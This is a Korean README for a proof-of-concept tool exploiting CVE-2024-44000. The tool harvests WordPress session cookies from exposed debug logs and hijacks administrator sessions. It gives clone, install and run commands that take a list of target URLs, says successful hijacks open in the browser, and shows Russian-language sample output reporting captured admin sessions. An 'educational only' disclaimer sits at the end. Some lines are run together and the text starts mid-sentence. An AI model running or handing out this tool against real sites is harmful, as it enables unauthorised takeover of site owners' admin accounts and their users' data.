
는 안전하지 않게 노출된 WordPress 사이트의 디버그 로그를 악용하고 세션 쿠키를 추출하도록 설계된 PoC 도구입니다
GenCookieSessionHijack는 WordPress 사이트의 안전하지 않게 노출된 디버그 로그를 악용하여 세션 쿠키를 추출하는 PoC 도구입니다. 이를 통해 공격자는 활성 관리자 세션을 가로채고 WordPress 관리자 대시보드에 무단으로 액세스할 수 있습니다.
wordpress_logged_in) 식별 및 필터링.git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt
list.txt).python GenCookieSessionHijack.py -f list.txt -o result.txt
-f, --file: URL 목록이 포함된 파일의 경로 (기본값: list.txt).-o, --output: 결과를 저장할 파일 (기본값: result.txt).python GenCookieSessionHijack.py -f targets.txt -o output.txt
이 명령은 targets.txt에서 URL 목록을 읽고, 세션 쿠키를 추출하여 사용하려고 시도한 후 결과를 output.txt에 저장합니다.
세션 하이재킹 시도가 성공하면 도구는 하이재킹된 관리자 세션 쿠키가 포함된 URL을 생성하고 기본 브라우저에서 직접 엽니다.
[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie
[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404
이 도구는 교육 목적으로만 제공되며 불법 활동에 사용해서는 안 됩니다. 작성자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다.